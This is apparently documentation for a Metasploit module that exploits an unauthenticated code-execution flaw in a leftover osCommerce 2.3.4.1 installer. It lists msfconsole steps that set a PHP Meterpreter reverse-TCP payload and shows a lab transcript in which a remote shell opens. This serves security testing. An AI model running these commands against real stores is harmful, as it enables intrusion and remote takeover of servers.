## Vulnerable Application

osCommerce version 2.3.4.1 is vulnerable to remote code execution. If the `/install/` directory was not removed, it is possible for an unauthenticated attacker to run the `install_4.php` script, which will create the configuration file for the installation. This allows the attacker to inject PHP code into the configuration file and execute it.

## Verification Steps

  1. Download and install [osCommerce 2.3.4.1](https://www.exploit-db.com/apps/ce2796b352d6e0fb4e9f03866ae98541-oscommerce-2.3.4.zip)
  2. `use exploit/multi/http/oscommerce_installer_unauth_code_exec`
  3. `set RHOST IP`
  4. `set PAYLOAD php/meterpreter/reverse_tcp`
  5. `set LHOST IP`
  6. `exploit`
  7. **Verify** a new Meterpreter session is started

## Scenarios

### osCommerce version 2.3.4.1 on Debian

```
msf > use exploit/multi/http/oscommerce_installer_unauth_code_exec
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set RHOST 172.16.40.188
RHOST => 172.16.40.188
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > exploit 

[*] Started reverse TCP handler on 172.16.40.5:4444 
[*] Sending stage (37543 bytes) to 172.16.40.188
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.188:47466) at 2018-04-05 18:14:45 +0100

meterpreter > sysinfo 
Computer    : oscommerce
OS          : Linux oscommerce 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64
Meterpreter : php/linux
meterpreter > 
```
